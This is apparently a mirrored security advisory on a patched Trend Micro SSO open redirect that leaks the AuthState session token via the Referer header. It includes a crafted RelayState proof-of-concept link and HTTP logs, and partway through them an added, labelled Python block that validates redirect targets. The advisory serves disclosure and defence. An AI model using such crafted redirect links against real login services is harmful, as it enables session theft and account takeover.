TrendMicro SSO Redirect / Session Theft

31 Mar 2016 · Reported by Hadji Samir · Type: packetstorm · Source: packetstormsecurity.com

TrendMicro SSO Redirect & Session Theft Vulnerability in Account System (Web-Application) 2016 Q

Document Title:  
===============  
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1694  
  
Trend Micro ID: 1-1-1035080936  
  
  
Release Date:  
=============  
2016-03-31  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1694  
  
  
Common Vulnerability Scoring System:  
====================================  
6.5  
  
  
Product & Service Introduction:  
===============================  
Trend Micro Inc. is a global security software company founded in Los Angeles,  
California, with global headquarters in Tokyo, Japan, and regional headquarters  
in Asia, Europe and the Americas. The company develops security software for  
servers, cloud computing environments, and small business.  
Its cloud and virtualization security products provide cloud security for  
customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva Chen  
serves as Trend Micro's chief executive officer, a position she has held  
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as  
chairman of Trend Micro.  
  
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory core research team discovered a redirect and  
session web vulnerability in the official Trend Micro SSO online service  
web-application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)  
2016-01-29: Vendor Notification (Trend Micro Security Team)  
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)  
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)  
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]  
2016-03-31: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Trend Micro  
Product: Account System - (Web-Application) 2016 Q1  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A redirect issue with information leakage has been discovered in the  
official Trend Micro online-service web-application.  
The vulnerability allows an attacker to send a crafted link to the victim.  
Following the link (which requires a login) discloses information to the  
attacker's webserver. In this case the AuthState value is leaked.  
  
The vulnerability is located in SSOService.php. A remote attacker is able  
to craft a link by modifying the RelayState parameter so that it points to  
his webserver. After the victim clicks the link, the website requests him  
to login. After the login the victim is quietly redirected to the attacker's  
webserver. The preceding request carries the new AuthState in the GET query  
string, and the AuthState includes the user's session. The AuthState is then  
exposed in the Referer header of the request to the redirect target. The  
attacker can use the AuthState value to take over the account session.  
  
  
  
Proof of Concept (PoC):  
=======================  
The vulnerability can be exploited by remote attackers without a privileged  
web-application user account and with low user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below.  
  
Manual steps to reproduce the vulnerability ...  
1. Send the victim the link  
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US  
2. After logging in, the victim is redirected to yahoo.com.  
3. The AuthState value arrives in the Referer header at the RelayState  
target (yahoo.com in this demonstration; the attacker's website in a real attack).  
4. Successful reproduction of the vulnerability!  
  
  
--- PoC Session Logs [POST & GET] ---  
GET https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US  
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]  
Request Headers:  
Host[sso1.trendmicro.com]  
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)  
Gecko/20100101 Firefox/44.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate, br]  
Connection[keep-alive]  
Response Headers:  
Date[Fri, 29 Jan 2016 12:20:22 GMT]  
Server[Apache/2.2.15 (CentOS)]  
Strict-Transport-Security[max-age=63072000; includeSubdomains;  
preload]  
X-Frame-Options[SAMEORIGIN]  
x-content-type-options[nosniff]  
Connection[close]  
Transfer-Encoding[chunked]  
Content-Type[text/html; charset=UTF-8]  
  
  
  
POST https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp  
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[368] Mime Type[text/html]  
Request Headers:  
Host[account.trendmicro.com]  
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)  
Gecko/20100101 Firefox/44.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate, br]  
  
Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]  
Connection[keep-alive]  
Post Data:  
RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]  
Response Headers:  
Date[Fri, 29 Jan 2016 12:20:24 GMT]  
Server[Apache]  
  
Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d;  
path=/; httponly]  
Location[https://yahoo.com/my_account/]  
Pragma[no-cache]  
Cache-Control[no-cache, must-revalidate]  
Vary[Accept-Encoding]  
Content-Encoding[gzip]  
X-Frame-Options[SAMEORIGIN]  
Content-Length[368]  
Connection[close]  
Content-Type[text/html; charset=UTF-8]  
  
  
  
GET https://yahoo.com/my_account/  
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime Type[text/html]  
Request Headers:  
Host[yahoo.com]  
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)  
Gecko/20100101 Firefox/44.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate, br]  
  
Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]  
Cookie[B=]  
Connection[keep-alive]  
Response Headers:  
Date[Fri, 29 Jan 2016 11:52:31 GMT]  
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]  
Server[ATS]  
Location[https://www.yahoo.com/my_account/]  
Content-Type[text/html]  
Content-Language[en]  
Cache-Control[no-store, no-cache]  
  
y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]  
Content-Length[382]  
X-Firefox-Spdy[h2]  
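Two defensive checks derived from the report and the session log above, written here as an added example rather than code from the advisory, Trend Micro or SimpleSAMLphp: a RelayState validator of the kind the fix needs (same-site paths or allow-listed https hosts only) and a Referer audit that recognises a leaked AuthState exactly as it appears in the log and recovers the RelayState that caused the redirect. The allow-listed hostnames are an assumption for illustration.

```python
"""Defensive checks modelled on the two halves of the report above.

Added example, not Trend Micro's or SimpleSAMLphp's own code. The advisory
describes (1) an IdP endpoint that redirected to any RelayState and (2) a
login URL carrying the AuthState token, which then leaked via Referer to
the off-site redirect target. The ALLOWED_RELAY_HOSTS set is an assumption.
"""
from urllib.parse import parse_qs, unquote, urlsplit

ALLOWED_RELAY_HOSTS = frozenset({"account.trendmicro.com", "sso1.trendmicro.com"})

# Referer value copied from the PoC session log in the advisory above.
LEAKED_REFERER = (
    "https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php"
    "?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2F"
    "sso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid"
    "%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F"
    "%252Fyahoo.com%252Fmy_account%252F")


def is_safe_relay_state(relay_state: str, allowed_hosts=ALLOWED_RELAY_HOSTS) -> bool:
    """Accept only a same-site relative path or an https URL to an allow-listed host."""
    if not relay_state:
        return False
    rs = unquote(relay_state)            # the IdP receives the value URL-encoded
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in rs):
        return False                     # refuse whitespace and control characters
    rs = rs.replace("\\", "/")           # some browsers treat '\' as '/' in URLs
    parts = urlsplit(rs)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: one leading '/' only; '//host/...' is scheme-relative
        return rs.startswith("/") and not rs.startswith("//")
    if parts.scheme.lower() != "https":
        return False                     # also rejects javascript:, data:, http:
    if "@" in parts.netloc:
        return False                     # userinfo trick: https://trusted@evil.example/
    return parts.hostname in allowed_hosts


def extract_auth_state(url: str):
    """Return the AuthState value in a URL's query string, or None if absent."""
    vals = parse_qs(urlsplit(url).query).get("AuthState")
    return vals[0] if vals else None


def audit_referer(referer: str) -> dict:
    """Classify an outbound Referer the way a log reviewer would for this bug.
    The leaked AuthState embeds the original SSOService.php URL, so the
    RelayState that caused the redirect can be recovered and judged as well."""
    token = extract_auth_state(referer)
    result = {"auth_state_leaked": token is not None,
              "relay_state": None, "relay_state_safe": None}
    if token is None:
        return result
    _, sep, return_url = token.partition(":")   # log shows "<id>:<return URL>"
    if sep:
        rs = parse_qs(urlsplit(return_url).query).get("RelayState")
        if rs:
            result["relay_state"] = rs[0]
            result["relay_state_safe"] = is_safe_relay_state(rs[0])
    return result


if __name__ == "__main__":
    print(audit_referer(LEAKED_REFERER))
```

Run against the page's own Referer value, the audit reports the token as leaked and the recovered RelayState (https://yahoo.com/my_account/) as off-site, which is exactly the condition the validator would have rejected before issuing the redirect.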
  
  
Security Risk:  
==============  
The security risk of the session web and redirect vulnerability in the  
Trend Micro SSO online service web-application is estimated as high.  
(CVSS 6.5)  
  
  
Credits & Authors:  
==================  
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution  
Security GmbH]  
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties, either expressed  
or implied, including the warranties of merchantability and capability  
for a particular purpose. Vulnerability-Lab or its suppliers are not liable  
in any case of damage, including direct, indirect, incidental,  
consequential loss of business profits or special damages, even if  
Vulnerability-Lab  
or its suppliers have been advised of the possibility of such damages.  
Some states do not allow the exclusion or limitation of liability for  
consequential or incidental damages so the foregoing limitation may not  
apply. We do not approve or encourage anybody to break any vendor licenses,  
policies, deface websites, hack into databases or trade with  
fraud/stolen material.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com   
- www.evolution-sec.com  
Contact: [email protected] -  
[email protected] - [email protected]  
Section: magazine.vulnerability-db.com -  
vulnerability-lab.com/contact.php -  
evolution-sec.com/contact  
Social: twitter.com/#!/vuln_lab -  
facebook.com/VulnerabilityLab -  
youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php -  
vulnerability-lab.com/rss/rss_upcoming.php -  
vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php -  
vulnerability-lab.com/list-of-bug-bounty-programs.php -  
vulnerability-lab.com/register/  
  
Any modified copy or reproduction, including partially usages, of this  
file requires authorization from Vulnerability Laboratory. Permission to  
electronically redistribute this alert in its unmodified form is  
granted. All other rights, including the use of other media, are  
reserved by  
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,  
advisories, source code, videos and other information on this website  
is trademark of vulnerability-lab team & the specific authors or  
managers. To record, list (feed), modify, use or edit our material contact  
([email protected] or [email protected]) to get a  
permission.  
  
Copyright © 2016 | Vulnerability Laboratory - [Evolution  
Security GmbH]™  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
CONTACT: [email protected]  
  
  